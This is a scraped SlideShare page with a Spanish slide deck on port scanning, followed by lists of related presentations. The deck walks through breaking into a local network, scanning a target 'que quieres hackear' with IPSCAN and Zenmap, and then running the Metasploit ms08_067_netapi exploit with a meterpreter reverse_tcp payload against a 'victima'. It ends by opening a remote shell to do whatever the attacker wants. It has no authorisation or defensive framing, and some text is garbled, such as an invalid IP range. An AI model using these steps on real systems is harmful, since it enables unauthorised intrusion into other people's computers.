SlideShare una empresa de Scribd logo
Los puertos comunes como FTP (21) y HTTP (80) frecuentemente están bien 
protegidos y posiblemente sean vulnerables solo con acciones todavía por descubrir. 
 Trata otros puertos TCP y UDP que puedan olvidarse, como Telner y varios 
puertos UDP que se dejan abiertos para jugar por LAN. 
 Un puerto 22 abierto es usualmente evidencia de un servicio SSH (secure shell) 
en el objetivo, que algunas veces puede ser forzado abruptamente. 
Para vulnerar la seguridad 
1. Se vulnera la seguridad de una red puede ser WLAN_XXXX, CASA, HOGAR, etc. 
2. Luego se escanea la red con IPSCAN, para luego designar una ip. 
3. Luego se abre el cmd, y se ejecuta el siguiente comando.
Ejecute netstat con la opción -a para visualizar todas las conexiones 
activas en el sistema, tanto TCP como UDP:
Con la herramienta PORT SCANNER, se ingresa la IP de uno de los 
usuarios de la red para luego escanear que puertos están abiertos, y 
examinar la manera de vulnerar.
PUERTOS ESCANEADOS: 
 80/TCP: HTTP HyperText Transfer Protocol (Protocolo de 
Transferencia de HiperTexto) (WWW). 
 139/TCP: NetBIOS Servicio de sesiones 
 445/TCP: Microsoft-DS (Active Directory, compartición en Windows, 
gusano Sasser, Agobot) o también es usado por Microsoft-DS 
compartición de ficheros.
ENTRAR DESDE TELNET: 
 Abres una sesión TELNET desde 
Inicio>Ejecutar. En la ventana, desde el 
símbolo de comandos, tecleas 
 telnet XXX.XXX.XXX.XXX 
 donde las X representan la IP del router, es 
decir, la puerta de enlace. Por ejemplo: 
 telnet 192.168.1.1 
 A continuación, se te solicitará la contraseña 
del router para acceder a su menú de 
configuración. 
 Creo que es eso lo que necesitas. 
 Ahora introducimos el comando set naptserver: 
 Transport protocol [tcp udp gre ]: (para elegir el 
protocolo entre estos 3) en el ejemplo TCP 
 Service [name or port number]: Podemos introducir el 
número de puerto. En el ejemplo 4000 
 Server IP Address [self or IP address]: Aquí 
introducimos la ip privada del pc que vaya a hacer de 
servidor de nuestra aplicación. En el ejemplo 
192.168.1.199 (hay que borrar primero self, que sale 
puesto)
USANDO ZENMAP: 
Cuando descargues Nmap, también puedes descargar "Zenmap GUI" junto con él. Ábrelo una vez que lo 
encuentres, coloca el Protocolo de Internet (IP) de la computadora que quieres hackear en el campo "Objetivo". 
Digamos que quieres escanear un rango de direcciones IP, entonces tendrías que escribir la dirección IP inicial 
seguido de (sin espacios) un guión (-) y el final de la última dirección IP. Por ejemplo, si quieres escanear 
192.168.1.100 a 192.168.1.299, entonces deberías escribir 192.168.1.100-299. En el menú del "Perfil" de 
Zenmap selecciona "exploración intensa" si no está seleccionado. Haz clic en el Explorador y el programa 
escaneará la computadora o dispositivo de los puertos abiertos. Mira el Nmap de salida hasta que veas algunas 
palabras en verde. Estos son los puertos abiertos en el equipo o dispositivo. Si el puerto 23 está abierto, el 
dispositivo podrá hackearse si no tiene ninguna contraseña definida.
UTILIZANDO METAXPLOIT 
Un puerto TCP/IP abierto por defecto en el sistema operativo puede 
permitir a un usuario ingresar facilmente a su sistema si 
autorizacion nos puede llegar a consumir 100% de los recurso del 
equipo y dejar destrozos o hasta dejar fuera de funcionamiento 
Se necesita una pc con backtrack. 
Lo siguiente tenemos que ver si nuestra victima tiene habilitado el 
puerto 445 #nmap -sS -sP 192.168.1.26 
como lo tiene abilitado empezaremos hacer el trabajo de conexión 
con metasploit 
#msfconsole 
buscamos el exploit que usaremos 
#search /windows/smb/ms 
#use exploit/windows/smb/ms08_067_netapi 
ahora hay que asignar la direccion de la victima y la nuestra 
> set payload windows/meterpreter/reverse_tcp 
> set rhost 192.168.1.26 (ip de victima) 
> set lhost 192.168.1.28 (nuestra ip) 
> exploit ------>ejecutamos el exploit
ahora escribimos shell para ingresar al cmd de nuestra victima 
>shell 
cd .. 
cd .. 
hicimos dos cd .. para quedar ubicados en el disco duro C: 
hacemos un dir para saber que tiene en el disco duro 
y hacemos lo que queramos ahora crear carpetas, apagar el 
equipo, etc.
Habiendo decidido el puerto queda por saber el 
exploit que usaremos. Consultando la 
documentación de Metasploit vemos que para el 
puerto 445/tcp existen varios exploits. También 
puede verse una lista de los exploits disponibles 
por medio del comando show exploits. En mi caso 
me quedaré con el 
siguiente: windows/smb/ms08_067_netapi. 
Ahora seleccionamos el payload que inyectaremos. 
Podemos ver los payloads compatibles con el 
exploit seleccionado con el comando show 
payloads. 
Seleccionaremos el 
payload windows/shell_bind_tcp, que nos abre 
una shell. 
EJECUTADO PAYLOADS: 
Ahora nos queda ver el resto de parámetros 
necesarios antes de ejecutar el ataque. Para ello 
tenemos el comando show options 
Podemos ver como de todos los parametros a introducir tan 
solo hace falta especificar uno: RHOST que como bien se indica 
corresponde a la IP de la víctima (the target address).

Más contenido relacionado

La actualidad más candente

Práctica 5
Práctica 5Práctica 5
Práctica 5
ManixGames
 
Ethical hacking 01
Ethical hacking 01Ethical hacking 01
Ethical hacking 01
Tensor
 
Nmap
NmapNmap
Nmap backtrackgblatino pacman_id
Nmap backtrackgblatino pacman_idNmap backtrackgblatino pacman_id
Nmap backtrackgblatino pacman_idpacmanid
 
Ethical hacking 00a
Ethical hacking 00aEthical hacking 00a
Ethical hacking 00a
Tensor
 
Uso del escáner de puertos nmap
Uso del escáner de puertos nmapUso del escáner de puertos nmap
Uso del escáner de puertos nmap
Carlos Antonio Leal Saballos
 
Nmap6 cheatsheet eng v1
Nmap6 cheatsheet eng v1Nmap6 cheatsheet eng v1
Nmap6 cheatsheet eng v1
DamianGreg
 
Nmap
NmapNmap
Curso Basico Ponencia 3
Curso Basico Ponencia 3Curso Basico Ponencia 3
Curso Basico Ponencia 3Antonio Durán
 
MAITAINING ACCESS
MAITAINING ACCESSMAITAINING ACCESS
MAITAINING ACCESS
Tensor
 
Que es y como usar nmap
Que es y como usar nmapQue es y como usar nmap
Que es y como usar nmap
Luis Pinilla
 
Escaneo de puertos clase 2 complemento E 28 02-13
Escaneo de puertos clase 2 complemento E 28 02-13Escaneo de puertos clase 2 complemento E 28 02-13
Escaneo de puertos clase 2 complemento E 28 02-13
Tensor
 
Tecnicas avanzadas de penetracion a sistemas
Tecnicas avanzadas de penetracion a sistemasTecnicas avanzadas de penetracion a sistemas
Tecnicas avanzadas de penetracion a sistemasRafael Seg
 
Seguridad en Servidores CentOS con Elastix + Buenas Prácticas
Seguridad en Servidores CentOS con Elastix + Buenas PrácticasSeguridad en Servidores CentOS con Elastix + Buenas Prácticas
Seguridad en Servidores CentOS con Elastix + Buenas Prácticasrodrimartin
 
Herramienta net stat
Herramienta net statHerramienta net stat
Herramienta net statStuart Guzman
 
Ethical hacking 03
Ethical hacking 03Ethical hacking 03
Ethical hacking 03
Tensor
 
Comandos de red
Comandos de redComandos de red
Comandos de red
Alejandro Pineda
 
Interesante pero mal maquetado zenmap 212027457-zenmap (1)
Interesante pero mal maquetado zenmap   212027457-zenmap (1)Interesante pero mal maquetado zenmap   212027457-zenmap (1)
Interesante pero mal maquetado zenmap 212027457-zenmap (1)xavazquez
 

La actualidad más candente (20)

Nmap
NmapNmap
Nmap
 
Práctica 5
Práctica 5Práctica 5
Práctica 5
 
Ethical hacking 01
Ethical hacking 01Ethical hacking 01
Ethical hacking 01
 
Nmap
NmapNmap
Nmap
 
Nmap backtrackgblatino pacman_id
Nmap backtrackgblatino pacman_idNmap backtrackgblatino pacman_id
Nmap backtrackgblatino pacman_id
 
Ethical hacking 00a
Ethical hacking 00aEthical hacking 00a
Ethical hacking 00a
 
Uso del escáner de puertos nmap
Uso del escáner de puertos nmapUso del escáner de puertos nmap
Uso del escáner de puertos nmap
 
Nmap6 cheatsheet eng v1
Nmap6 cheatsheet eng v1Nmap6 cheatsheet eng v1
Nmap6 cheatsheet eng v1
 
Nmap
NmapNmap
Nmap
 
Curso Basico Ponencia 3
Curso Basico Ponencia 3Curso Basico Ponencia 3
Curso Basico Ponencia 3
 
MAITAINING ACCESS
MAITAINING ACCESSMAITAINING ACCESS
MAITAINING ACCESS
 
Que es y como usar nmap
Que es y como usar nmapQue es y como usar nmap
Que es y como usar nmap
 
Escaneo de puertos clase 2 complemento E 28 02-13
Escaneo de puertos clase 2 complemento E 28 02-13Escaneo de puertos clase 2 complemento E 28 02-13
Escaneo de puertos clase 2 complemento E 28 02-13
 
Tecnicas avanzadas de penetracion a sistemas
Tecnicas avanzadas de penetracion a sistemasTecnicas avanzadas de penetracion a sistemas
Tecnicas avanzadas de penetracion a sistemas
 
Seguridad en Servidores CentOS con Elastix + Buenas Prácticas
Seguridad en Servidores CentOS con Elastix + Buenas PrácticasSeguridad en Servidores CentOS con Elastix + Buenas Prácticas
Seguridad en Servidores CentOS con Elastix + Buenas Prácticas
 
Uso de Telnet en Windows y Linux
Uso de Telnet en Windows y LinuxUso de Telnet en Windows y Linux
Uso de Telnet en Windows y Linux
 
Herramienta net stat
Herramienta net statHerramienta net stat
Herramienta net stat
 
Ethical hacking 03
Ethical hacking 03Ethical hacking 03
Ethical hacking 03
 
Comandos de red
Comandos de redComandos de red
Comandos de red
 
Interesante pero mal maquetado zenmap 212027457-zenmap (1)
Interesante pero mal maquetado zenmap   212027457-zenmap (1)Interesante pero mal maquetado zenmap   212027457-zenmap (1)
Interesante pero mal maquetado zenmap 212027457-zenmap (1)
 

Destacado

Trabajoredeszenmap
TrabajoredeszenmapTrabajoredeszenmap
Trabajoredeszenmapmaxbujin
 
Marketing Online
Marketing OnlineMarketing Online
Marketing Online
arnoldvq16
 
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
TR Hirecom
 
Norma ISO 38500
Norma ISO 38500Norma ISO 38500
Norma ISO 38500
arnoldvq16
 
Tecnicas de escaneo de puertos
Tecnicas de escaneo de puertosTecnicas de escaneo de puertos
Tecnicas de escaneo de puertos
Francisco Vergara
 

Destacado (6)

Trabajoredeszenmap
TrabajoredeszenmapTrabajoredeszenmap
Trabajoredeszenmap
 
Zenmap
ZenmapZenmap
Zenmap
 
Marketing Online
Marketing OnlineMarketing Online
Marketing Online
 
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
 
Norma ISO 38500
Norma ISO 38500Norma ISO 38500
Norma ISO 38500
 
Tecnicas de escaneo de puertos
Tecnicas de escaneo de puertosTecnicas de escaneo de puertos
Tecnicas de escaneo de puertos
 

Similar a Escaneo de Puertos

Ejercicios de redes e internet 1
Ejercicios de redes e internet 1Ejercicios de redes e internet 1
Ejercicios de redes e internet 1
Kevin Andres Orozco Camayo
 
Listas de acceso
Listas de accesoListas de acceso
Listas de acceso
Leonoa Brises Sixtos
 
Listas de acceso estándar y extendidas
Listas de acceso estándar y extendidasListas de acceso estándar y extendidas
Listas de acceso estándar y extendidas
JAV_999
 
TP OBLIGATORIO WireShark Intro + ARP.pdf
TP OBLIGATORIO WireShark Intro + ARP.pdfTP OBLIGATORIO WireShark Intro + ARP.pdf
TP OBLIGATORIO WireShark Intro + ARP.pdf
JavierRamirez651634
 
Comandos de red
Comandos de red Comandos de red
Comandos de red
Anderson Huila Diago
 
Practicas hackx crack_05
Practicas hackx crack_05Practicas hackx crack_05
Practicas hackx crack_05
Aldo Jamir Leone Icaza
 
PROCESOS EN LINUX. ::: http://leymebamba.com
PROCESOS EN LINUX.   ::: http://leymebamba.comPROCESOS EN LINUX.   ::: http://leymebamba.com
PROCESOS EN LINUX. ::: http://leymebamba.com
{|::::::. ELDAVAN .:::::::|}
 
Comandos de red
Comandos de redComandos de red
Comandos de red
jhon zamora
 
Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3Brat Stell
 
Tcpdump
TcpdumpTcpdump
Tcpdump
Tensor
 
Articulo nmap pvalera
Articulo nmap pvaleraArticulo nmap pvalera
Articulo nmap pvaleraguest30c8e1
 
Taller comandos para solucionar problemas en la red
Taller comandos para  solucionar problemas en la redTaller comandos para  solucionar problemas en la red
Taller comandos para solucionar problemas en la redguestf6e4f00
 
How to medidas de desempeño
How to medidas de desempeñoHow to medidas de desempeño
How to medidas de desempeñomiss051
 
Comandos de Red
Comandos de RedComandos de Red
Comandos de Red
AndrsVillarreal6
 
Comandos utilizados en redes anderson alvarado 6to computacion
Comandos utilizados en redes anderson alvarado 6to computacionComandos utilizados en redes anderson alvarado 6to computacion
Comandos utilizados en redes anderson alvarado 6to computacion
Ander Alvarado
 
Tcpdump a.2
Tcpdump a.2Tcpdump a.2
Tcpdump a.2
Tensor
 
Queesycomousarnmap 150527171529-lva1-app6892
Queesycomousarnmap 150527171529-lva1-app6892Queesycomousarnmap 150527171529-lva1-app6892
Queesycomousarnmap 150527171529-lva1-app6892
Karina Gutiérrez
 

Similar a Escaneo de Puertos (20)

Ejercicios de redes e internet 1
Ejercicios de redes e internet 1Ejercicios de redes e internet 1
Ejercicios de redes e internet 1
 
Listas de acceso
Listas de accesoListas de acceso
Listas de acceso
 
Listas de acceso estándar y extendidas
Listas de acceso estándar y extendidasListas de acceso estándar y extendidas
Listas de acceso estándar y extendidas
 
TP OBLIGATORIO WireShark Intro + ARP.pdf
TP OBLIGATORIO WireShark Intro + ARP.pdfTP OBLIGATORIO WireShark Intro + ARP.pdf
TP OBLIGATORIO WireShark Intro + ARP.pdf
 
Comandos de red
Comandos de red Comandos de red
Comandos de red
 
Nmap
NmapNmap
Nmap
 
Practicas hackx crack_05
Practicas hackx crack_05Practicas hackx crack_05
Practicas hackx crack_05
 
PROCESOS EN LINUX. ::: http://leymebamba.com
PROCESOS EN LINUX.   ::: http://leymebamba.comPROCESOS EN LINUX.   ::: http://leymebamba.com
PROCESOS EN LINUX. ::: http://leymebamba.com
 
Comandos de red
Comandos de redComandos de red
Comandos de red
 
Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3
 
Tcpdump
TcpdumpTcpdump
Tcpdump
 
Articulo nmap pvalera
Articulo nmap pvaleraArticulo nmap pvalera
Articulo nmap pvalera
 
Taller comandos para solucionar problemas en la red
Taller comandos para  solucionar problemas en la redTaller comandos para  solucionar problemas en la red
Taller comandos para solucionar problemas en la red
 
How to medidas de desempeño
How to medidas de desempeñoHow to medidas de desempeño
How to medidas de desempeño
 
Comandos de Red
Comandos de RedComandos de Red
Comandos de Red
 
Curso Redes Linex 5
Curso Redes Linex 5Curso Redes Linex 5
Curso Redes Linex 5
 
Curso Redes Linex 5
Curso Redes Linex 5Curso Redes Linex 5
Curso Redes Linex 5
 
Comandos utilizados en redes anderson alvarado 6to computacion
Comandos utilizados en redes anderson alvarado 6to computacionComandos utilizados en redes anderson alvarado 6to computacion
Comandos utilizados en redes anderson alvarado 6to computacion
 
Tcpdump a.2
Tcpdump a.2Tcpdump a.2
Tcpdump a.2
 
Queesycomousarnmap 150527171529-lva1-app6892
Queesycomousarnmap 150527171529-lva1-app6892Queesycomousarnmap 150527171529-lva1-app6892
Queesycomousarnmap 150527171529-lva1-app6892
 

Último

DESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdfDESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
marianabz2403
 
ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024
ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024
ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024
DanielErazoMedina
 
biogas industrial para guiarse en proyectos
biogas industrial para guiarse en proyectosbiogas industrial para guiarse en proyectos
biogas industrial para guiarse en proyectos
Luis Enrique Zafra Haro
 
Posnarrativas en la era de la IA generativa
Posnarrativas en la era de la IA generativaPosnarrativas en la era de la IA generativa
Posnarrativas en la era de la IA generativa
Fernando Villares
 
TRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
TRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdfTRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
TRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
thomasdcroz38
 
Estructuras Básicas_ Conceptos Basicos De Programacion.pdf
Estructuras Básicas_ Conceptos Basicos De Programacion.pdfEstructuras Básicas_ Conceptos Basicos De Programacion.pdf
Estructuras Básicas_ Conceptos Basicos De Programacion.pdf
IsabellaRubio6
 
Conceptos Básicos de Programación L.D 10-5
Conceptos Básicos de Programación L.D 10-5Conceptos Básicos de Programación L.D 10-5
Conceptos Básicos de Programación L.D 10-5
JulyMuoz18
 
Estructuras básicas_ conceptos de programación (1).docx
Estructuras básicas_ conceptos de programación  (1).docxEstructuras básicas_ conceptos de programación  (1).docx
Estructuras básicas_ conceptos de programación (1).docx
SamuelRamirez83524
 
Diagrama de flujo - ingenieria de sistemas 5to semestre
Diagrama de flujo - ingenieria de sistemas 5to semestreDiagrama de flujo - ingenieria de sistemas 5to semestre
Diagrama de flujo - ingenieria de sistemas 5to semestre
DiegoCampos433849
 
Alan Turing Vida o biografía resumida como presentación
Alan Turing Vida o biografía resumida como presentaciónAlan Turing Vida o biografía resumida como presentación
Alan Turing Vida o biografía resumida como presentación
JuanPrez962115
 
EduFlex, una educación accesible para quienes no entienden en clases
EduFlex, una educación accesible para quienes no entienden en clasesEduFlex, una educación accesible para quienes no entienden en clases
EduFlex, una educación accesible para quienes no entienden en clases
PABLOCESARGARZONBENI
 
Inteligencia Artificial y Ciberseguridad.pdf
Inteligencia Artificial y Ciberseguridad.pdfInteligencia Artificial y Ciberseguridad.pdf
Inteligencia Artificial y Ciberseguridad.pdf
Emilio Casbas
 
Conceptos Básicos de Programación Proyecto
Conceptos Básicos de Programación ProyectoConceptos Básicos de Programación Proyecto
Conceptos Básicos de Programación Proyecto
cofferub
 
leidy fuentes - power point -expocccion -unidad 4 (1).pptx
leidy fuentes - power point -expocccion -unidad 4 (1).pptxleidy fuentes - power point -expocccion -unidad 4 (1).pptx
leidy fuentes - power point -expocccion -unidad 4 (1).pptx
Leidyfuentes19
 
Robótica educativa para la eduacion primaria .pptx
Robótica educativa para la eduacion primaria .pptxRobótica educativa para la eduacion primaria .pptx
Robótica educativa para la eduacion primaria .pptx
44652726
 
3Redu: Responsabilidad, Resiliencia y Respeto
3Redu: Responsabilidad, Resiliencia y Respeto3Redu: Responsabilidad, Resiliencia y Respeto
3Redu: Responsabilidad, Resiliencia y Respeto
cdraco
 
Estructuras básicas_ conceptos básicos de programación.pdf
Estructuras básicas_  conceptos básicos de programación.pdfEstructuras básicas_  conceptos básicos de programación.pdf
Estructuras básicas_ conceptos básicos de programación.pdf
ItsSofi
 
(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática
(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática
(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática
vazquezgarciajesusma
 
proyecto invernadero desde el departamento de tecnología para Erasmus
proyecto invernadero desde el departamento de tecnología para Erasmusproyecto invernadero desde el departamento de tecnología para Erasmus
proyecto invernadero desde el departamento de tecnología para Erasmus
raquelariza02
 
Trabajo Coding For kids 1 y 2 grado 9-4.pdf
Trabajo Coding For kids 1 y 2 grado 9-4.pdfTrabajo Coding For kids 1 y 2 grado 9-4.pdf
Trabajo Coding For kids 1 y 2 grado 9-4.pdf
cj3806354
 

Último (20)

DESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdfDESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
 
ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024
ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024
ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024
 
biogas industrial para guiarse en proyectos
biogas industrial para guiarse en proyectosbiogas industrial para guiarse en proyectos
biogas industrial para guiarse en proyectos
 
Posnarrativas en la era de la IA generativa
Posnarrativas en la era de la IA generativaPosnarrativas en la era de la IA generativa
Posnarrativas en la era de la IA generativa
 
TRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
TRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdfTRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
TRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
 
Estructuras Básicas_ Conceptos Basicos De Programacion.pdf
Estructuras Básicas_ Conceptos Basicos De Programacion.pdfEstructuras Básicas_ Conceptos Basicos De Programacion.pdf
Estructuras Básicas_ Conceptos Basicos De Programacion.pdf
 
Conceptos Básicos de Programación L.D 10-5
Conceptos Básicos de Programación L.D 10-5Conceptos Básicos de Programación L.D 10-5
Conceptos Básicos de Programación L.D 10-5
 
Estructuras básicas_ conceptos de programación (1).docx
Estructuras básicas_ conceptos de programación  (1).docxEstructuras básicas_ conceptos de programación  (1).docx
Estructuras básicas_ conceptos de programación (1).docx
 
Diagrama de flujo - ingenieria de sistemas 5to semestre
Diagrama de flujo - ingenieria de sistemas 5to semestreDiagrama de flujo - ingenieria de sistemas 5to semestre
Diagrama de flujo - ingenieria de sistemas 5to semestre
 
Alan Turing Vida o biografía resumida como presentación
Alan Turing Vida o biografía resumida como presentaciónAlan Turing Vida o biografía resumida como presentación
Alan Turing Vida o biografía resumida como presentación
 
EduFlex, una educación accesible para quienes no entienden en clases
EduFlex, una educación accesible para quienes no entienden en clasesEduFlex, una educación accesible para quienes no entienden en clases
EduFlex, una educación accesible para quienes no entienden en clases
 
Inteligencia Artificial y Ciberseguridad.pdf
Inteligencia Artificial y Ciberseguridad.pdfInteligencia Artificial y Ciberseguridad.pdf
Inteligencia Artificial y Ciberseguridad.pdf
 
Conceptos Básicos de Programación Proyecto
Conceptos Básicos de Programación ProyectoConceptos Básicos de Programación Proyecto
Conceptos Básicos de Programación Proyecto
 
leidy fuentes - power point -expocccion -unidad 4 (1).pptx
leidy fuentes - power point -expocccion -unidad 4 (1).pptxleidy fuentes - power point -expocccion -unidad 4 (1).pptx
leidy fuentes - power point -expocccion -unidad 4 (1).pptx
 
Robótica educativa para la eduacion primaria .pptx
Robótica educativa para la eduacion primaria .pptxRobótica educativa para la eduacion primaria .pptx
Robótica educativa para la eduacion primaria .pptx
 
3Redu: Responsabilidad, Resiliencia y Respeto
3Redu: Responsabilidad, Resiliencia y Respeto3Redu: Responsabilidad, Resiliencia y Respeto
3Redu: Responsabilidad, Resiliencia y Respeto
 
Estructuras básicas_ conceptos básicos de programación.pdf
Estructuras básicas_  conceptos básicos de programación.pdfEstructuras básicas_  conceptos básicos de programación.pdf
Estructuras básicas_ conceptos básicos de programación.pdf
 
(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática
(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática
(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática
 
proyecto invernadero desde el departamento de tecnología para Erasmus
proyecto invernadero desde el departamento de tecnología para Erasmusproyecto invernadero desde el departamento de tecnología para Erasmus
proyecto invernadero desde el departamento de tecnología para Erasmus
 
Trabajo Coding For kids 1 y 2 grado 9-4.pdf
Trabajo Coding For kids 1 y 2 grado 9-4.pdfTrabajo Coding For kids 1 y 2 grado 9-4.pdf
Trabajo Coding For kids 1 y 2 grado 9-4.pdf
 

Escaneo de Puertos

  • 1. Los puertos comunes como FTP (21) y HTTP (80) frecuentemente están bien protegidos y posiblemente sean vulnerables solo con acciones todavía por descubrir.  Trata otros puertos TCP y UDP que puedan olvidarse, como Telner y varios puertos UDP que se dejan abiertos para jugar por LAN.  Un puerto 22 abierto es usualmente evidencia de un servicio SSH (secure shell) en el objetivo, que algunas veces puede ser forzado abruptamente. Para vulnerar la seguridad 1. Se vulnera la seguridad de una red puede ser WLAN_XXXX, CASA, HOGAR, etc. 2. Luego se escanea la red con IPSCAN, para luego designar una ip. 3. Luego se abre el cmd, y se ejecuta el siguiente comando.
  • 2. Ejecute netstat con la opción -a para visualizar todas las conexiones activas en el sistema, tanto TCP como UDP:
  • 3. Con la herramienta PORT SCANNER, se ingresa la IP de uno de los usuarios de la red para luego escanear que puertos están abiertos, y examinar la manera de vulnerar.
  • 4. PUERTOS ESCANEADOS:  80/TCP: HTTP HyperText Transfer Protocol (Protocolo de Transferencia de HiperTexto) (WWW).  139/TCP: NetBIOS Servicio de sesiones  445/TCP: Microsoft-DS (Active Directory, compartición en Windows, gusano Sasser, Agobot) o también es usado por Microsoft-DS compartición de ficheros.
  • 5. ENTRAR DESDE TELNET:  Abres una sesión TELNET desde Inicio>Ejecutar. En la ventana, desde el símbolo de comandos, tecleas  telnet XXX.XXX.XXX.XXX  donde las X representan la IP del router, es decir, la puerta de enlace. Por ejemplo:  telnet 192.168.1.1  A continuación, se te solicitará la contraseña del router para acceder a su menú de configuración.  Creo que es eso lo que necesitas.  Ahora introducimos el comando set naptserver:  Transport protocol [tcp udp gre ]: (para elegir el protocolo entre estos 3) en el ejemplo TCP  Service [name or port number]: Podemos introducir el número de puerto. En el ejemplo 4000  Server IP Address [self or IP address]: Aquí introducimos la ip privada del pc que vaya a hacer de servidor de nuestra aplicación. En el ejemplo 192.168.1.199 (hay que borrar primero self, que sale puesto)
  • 6. USANDO ZENMAP: Cuando descargues Nmap, también puedes descargar "Zenmap GUI" junto con él. Ábrelo una vez que lo encuentres, coloca el Protocolo de Internet (IP) de la computadora que quieres hackear en el campo "Objetivo". Digamos que quieres escanear un rango de direcciones IP, entonces tendrías que escribir la dirección IP inicial seguido de (sin espacios) un guión (-) y el final de la última dirección IP. Por ejemplo, si quieres escanear 192.168.1.100 a 192.168.1.299, entonces deberías escribir 192.168.1.100-299. En el menú del "Perfil" de Zenmap selecciona "exploración intensa" si no está seleccionado. Haz clic en el Explorador y el programa escaneará la computadora o dispositivo de los puertos abiertos. Mira el Nmap de salida hasta que veas algunas palabras en verde. Estos son los puertos abiertos en el equipo o dispositivo. Si el puerto 23 está abierto, el dispositivo podrá hackearse si no tiene ninguna contraseña definida.
  • 7. UTILIZANDO METAXPLOIT Un puerto TCP/IP abierto por defecto en el sistema operativo puede permitir a un usuario ingresar facilmente a su sistema si autorizacion nos puede llegar a consumir 100% de los recurso del equipo y dejar destrozos o hasta dejar fuera de funcionamiento Se necesita una pc con backtrack. Lo siguiente tenemos que ver si nuestra victima tiene habilitado el puerto 445 #nmap -sS -sP 192.168.1.26 como lo tiene abilitado empezaremos hacer el trabajo de conexión con metasploit #msfconsole buscamos el exploit que usaremos #search /windows/smb/ms #use exploit/windows/smb/ms08_067_netapi ahora hay que asignar la direccion de la victima y la nuestra > set payload windows/meterpreter/reverse_tcp > set rhost 192.168.1.26 (ip de victima) > set lhost 192.168.1.28 (nuestra ip) > exploit ------>ejecutamos el exploit
  • 8. ahora escribimos shell para ingresar al cmd de nuestra victima >shell cd .. cd .. hicimos dos cd .. para quedar ubicados en el disco duro C: hacemos un dir para saber que tiene en el disco duro y hacemos lo que queramos ahora crear carpetas, apagar el equipo, etc.
  • 9. Habiendo decidido el puerto queda por saber el exploit que usaremos. Consultando la documentación de Metasploit vemos que para el puerto 445/tcp existen varios exploits. También puede verse una lista de los exploits disponibles por medio del comando show exploits. En mi caso me quedaré con el siguiente: windows/smb/ms08_067_netapi. Ahora seleccionamos el payload que inyectaremos. Podemos ver los payloads compatibles con el exploit seleccionado con el comando show payloads. Seleccionaremos el payload windows/shell_bind_tcp, que nos abre una shell. EJECUTADO PAYLOADS: Ahora nos queda ver el resto de parámetros necesarios antes de ejecutar el ataque. Para ello tenemos el comando show options Podemos ver como de todos los parametros a introducir tan solo hace falta especificar uno: RHOST que como bien se indica corresponde a la IP de la víctima (the target address).